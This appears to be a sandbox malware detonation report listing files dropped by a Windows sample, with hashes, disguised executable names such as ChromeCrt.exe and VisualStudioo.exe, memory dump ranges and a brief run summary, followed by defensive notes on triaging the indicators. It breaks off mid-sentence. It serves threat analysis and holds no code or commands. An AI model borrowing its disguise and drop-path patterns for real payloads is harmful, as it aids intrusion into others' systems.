memory/4000-178-0x0000000007360000-0x00000000073F6000-memory.dmp

memory/4104-179-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\RunihaiVersion.exe

MD5 05b73b535c4337c16fc3f039c1b30dc1
SHA1 8de245727efd7aaa7fa1a3662430e823b68cec0a
SHA256 6de49dcfa3016a3a99a4cf0d60745bff75d5e34902fd91b20478673184b482de
SHA512 6bb62389c085bd29c358427abf6fae55343b923ee1382e28e4a456fab5991c28bcbea202867beb90944adc8033a7a149c2f5234e2464f2f36c07dc32fa7b04f6

C:\Users\Public\Music\es.bat

MD5 b00ef4b757bc25a0f41c3d74961ff9a0
SHA1 cfdaca2c4c8f1fce33275361260b251d8d74173a
SHA256 417a75bfa635462b42c3509d826180f719593eacbe29778352461c28579ddd76
SHA512 259aef5462238ec388e469de0cbec03f057f536931680060835958a3028aef3a534a13e6f7c6ada6cea12cc520df09a1143ec79920bdd39cc0c875639ba2d93a

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Public\Music\israil2.exe

MD5 e000e033786867fa9caa5d9d6728384a
SHA1 4313fddde6aba146cd3c3ddd42f2db36194ded10
SHA256 7c12c2663642035392b389dbdc787c42fe669085be401b3108c14fe2e44a6131
SHA512 3c091650c454267153b7b88e6093ea89cb799703eebb8d4ed5e8d25591a0a07261db712eec6b46b74b0408d8cea5103e9aabd4975d9d8fac56be6340a54d8e96

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8dd057b34ef460c75e2cf850597e6af
SHA1 92021d50c99ffc1e1a17a71a074bc8b4b527a129
SHA256 c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3
SHA512 007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

C:\Users\Public\Music\uuac.bat

MD5 c0c5cf18ed5b12d0cf2e77312e553328
SHA1 9f594d79de6cd8d546a6b2869029ebbd59c4b93f
SHA256 197ad34574917cff1d33ae3789fecb0120797e99e652c9746704846ef4a1cc69
SHA512 508d0692ab6e648b0d6de9c29c2b4bd85edcf1e3046533f83cdb1d4f98be6b830ea3f185ef81037afd19d13156a3d528c15339608337b62842d32af24b11ca78

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8dd057b34ef460c75e2cf850597e6af
SHA1 92021d50c99ffc1e1a17a71a074bc8b4b527a129
SHA256 c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3
SHA512 007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9abf12be9f3d525dd3c104f6e0470c9e
SHA1 830d672ae6f2220fb45be7e7434857e42d029ad4
SHA256 e2a25fd8d5b6c38910388018575e895db8efe5ea822385e752e347f7f588ad44
SHA512 2b7675ad4e3bc731d9496daf6480d2b40a9be7d5580e558ccef4766f5149cbbe9cf64ea373228f5141ada60371a6c988e7c8ba7eb0b97e67a37086d6c0288040

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\xx.exe

MD5 d3e4bf5f503e63ca9f51a3c19c842b0d
SHA1 7f6fd78fbec8b65744a0cb8ad8e992ed383f0df4
SHA256 5372854f4e74839bd6fbb780f40180921bbbb648d863534c36b029a44c90b549
SHA512 27c1a8d9959a27d6fbc370dfb677eb9e022417b8a0b8adc103713269a961d6c8eb8782299b745d53ba0b7c4291bf53b3951d5959831df328f2a59effc3fac10f

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe

MD5 e026996a95122a919a1ee58b66d9d18c
SHA1 ed4db7e91d93155484545bf071026c8333fb4f87
SHA256 b5a7a0c9af69d911753b0afdc3859f9f7509749520a308ba4e1e5b547e2c4c9c
SHA512 6cf718e19b3eea23bf56d2720d8972017c9b65f5f102a9e78c4aad89eed64ba2377a56ab28341716120169d750db0855c207c986eb1893c0e4cb7294dae75871

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d7bdae60e0d39c0b005d99bd7c0da84
SHA1 a5e4bb58330b7e88e947dac5c4683cf9d80ea6f5
SHA256 01905badf35db9c907e5cfa9fd125345e91b594b0388a227c36e828ed601a8a7
SHA512 cf557df93d67369762551b27d6a3d73d351b5739ae7d969b9d935f1535ffe44971353add97c45adca0a9a37b4f86717eb0910f6af8ba761920fd0d6aacd21cb3

C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe

MD5 382a46ef7bc798b728ed963d542d61d7
SHA1 4af1e5c9d85716555f95d4f88ec5db4d6205b611
SHA256 f63f83f9ac97bdb155e01b72c8bf38797971ad087d1eb54e6019d10ce901fcc7
SHA512 5063fe51a2b048290a7b92f785b1197df981a95b84e3d04610e7dcf5767318f527598fd62c4b89e4da90b7c47ed1c7544b9862bd292123c79f43db9b4dff57f9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe

MD5 2a9c1b05b7c875f6c0f2c43e7abcc381
SHA1 623f806907f075368e454ba79f1812007a749c47
SHA256 1a16f37765daa60e33fce4570fcc20698d63c058a646956e2e31ddb42f8616e5
SHA512 479218de83e5dbbd8e17762dc2cb307e80c0f82d87ea3a9778a8da3936c727529d4238fab8e1ec301a2ce2afb70d3c90e3d3f117cd48fa165254b2feb658a808

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe

MD5 1d19f212f80a82428d6d5aef7b4b784b
SHA1 a58811a2f24fb402058c3987548f4b80fde787f0
SHA256 2756eab9d223ada7198458274fb820630d61f4de1c34ab2db9c743bdbc8c4ebd
SHA512 13673c5cc6c52dc57d5982cf1280ad2f03208586cca40f89f170b55b04b1654069c948a07276d7093ee6899daf41429400c152789ecb1c45265006aa221c8015

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe

MD5 4743f7ac802d1cda9c8b55556a4996a5
SHA1 aeef2809aaed922c4c447d50a9eccae9001abb75
SHA256 dd9c74f4bd271caf2c8849bb233ccdffb7b7de3c97394aec58714b86286ee749
SHA512 dbc47c08e4b6ca54e7926fa824989308844e4f116f30e84b46fd7ac88e74e82dc4c079a06193042fcd2466f90054d52d49e1e187a8c6c7d6871fbd2bdc32ed14

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe

MD5 6305d26e0d0da07bf2863c814880fd90
SHA1 188e757b24db85262538bdc5ad27dc95ee6c79d6
SHA256 a643f81d20450ab0676df158f88f4a7fad7c2bfbedcf9cddfed850b2c5867677
SHA512 e8c9dd5aec0f30f80f978837b9336142e82b5dbbf1b393e3bd982967e80eebc27211f28d0ec18baafa733191828b3622c64246529b7c23c89edf9f0b8a4ff973

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n4vdGlPOcH.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

MD5 112177b6405c9b96a95b4747ba9d4dbe
SHA1 724de53c31774aaba7a319f92d2c76399252a729
SHA256 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4
SHA512 dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\WiDefault.exe

MD5 394764dfa74ce250be386b93940a4439
SHA1 889ff161e9760d4fd66fcb18983ecba1082ae296
SHA256 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a
SHA512 ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234

memory/2812-442-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 687ff3bb8a8b15736d686119a681097c
SHA1 18f43aa14e56d4fb158a8804f79fc3c604903991
SHA256 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2
SHA512 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Roaming\2WinDefault.exe

MD5 b4f4334ebcea2266ca228c895b1250a3
SHA1 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd
SHA256 cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864
SHA512 faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\OperaCrt.exe

MD5 7163cd033d1c5f8fc0aad0e215f09747
SHA1 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f
SHA256 af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa
SHA512 a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f

memory/448-515-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

C:\Users\Admin\AppData\Roaming\VisualStudioo.exe

MD5 77878e1d8406d343fdbbfc359b33ff00
SHA1 7f6c6bae65298f8a112c97def45f66e6fb99ada8
SHA256 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9
SHA512 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56

memory/3312-539-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

memory/4712-558-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-559-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-561-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-563-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-565-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-567-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-569-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-571-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-573-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-575-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-577-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-579-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-581-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-583-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-585-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-587-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-589-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-591-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-595-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-607-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-610-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-612-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-614-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-616-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-618-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-620-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-622-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-624-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-626-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-628-0x0000000006B40000-0x0000000006BD8000-memory.dmp

memory/4712-630-0x0000000006B40000-0x0000000006BD8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62d0a8f2dde92001b69bb430c8fee54c
SHA1 9bb2225f9ed5cb3c71c9f166f0fb7a42a7c316ec
SHA256 bd5bcb0c12d851d5e41646c4673e9af1daf7b37743e3b32d7b3754e16732f3f1
SHA512 a69090461e797b37877e4237686ddf4fe055da4525436660a874fb868a426299bf01fc3373decc3f51b5ebdd3267dc0d7d303ee4c7d1d8fb72704d3190e20174

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-15 10:44

Reported

2023-11-15 10:46

Platform

win7-20231023-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

Signatures

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\resources.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 816

Network

N/A

Files

memory/2244-0-0x0000000001270000-0x0000000001286000-memory.dmp

memory/2244-1-0x0000000073F10000-0x00000000745FE000-memory.dmp

memory/2244-3-0x0000000073F10000-0x00000000745FE000-memory.dmp
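Two things to keep straight when lifting indicators from the Files listings of both detonations. First, the same path appears several times with identical digests (israil.exe, ChromeCrt.exe, 2WinDefault.exe, OperaCrt.exe and others), so deduplicate on SHA256 before the list goes anywhere. Second, not everything listed is attacker-written: StartupProfileData-NonInteractive, ModuleAnalysisCache and __PSScriptPolicyTest_*.ps1 are files PowerShell writes about itself, and the CLR_v4.0_32\UsageLogs\*.log and CLR_v4.0\UsageLogs\*.log entries are the .NET runtime's usage logs, one per managed executable it runs; they tell you that powershell.exe, israil2.exe and n4vdGlPOcH.exe ran as managed code (the _32 directory is the 32-bit runtime) but are not indicators worth blocking on. The memory/PID-N-start-end entries are the sandbox's per-process dumps: the 0x74D30000-0x754E0000 range recurs across a dozen PIDs in the Windows 10 run, which is what a shared module mapping looks like, whereas the 0x400000-based dumps for PIDs 2812, 448 and 3312 sit at the default 32-bit image base and are where to look first for a payload loaded in place. The behavioral1 run on 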